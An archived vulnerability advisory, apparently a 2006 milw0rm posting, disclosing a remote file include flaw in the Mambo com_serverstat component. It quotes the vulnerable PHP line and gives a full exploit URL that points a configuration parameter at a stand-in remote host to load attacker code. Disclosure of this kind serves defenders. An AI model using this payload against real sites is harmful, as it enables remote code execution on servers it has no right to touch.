Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-4749.htm

Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability



Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability



=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==0D
+=0D
+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability=0D
+=0D
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==0D
+=0D
+Author: xoron (turkish hacker)=0D
+=0D
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==0D
+=0D
+Class : Remote=0D
+=0D
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==0D
+=0D
+Vuln Code: require_once($mosConfig_absolute_path."/administrator/components/com_serverstat/config.serverstat.php");=0D
+=0D
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==0D
+=0D
+Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://evil_scripts?=0D 
+=0D
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==0D
+=0D
Thanx : str0ke, Ironfist, Preddy, SHiKaA=0D
+=0D
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==0D
=0D
# milw0rm.com [2006-09-14]=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH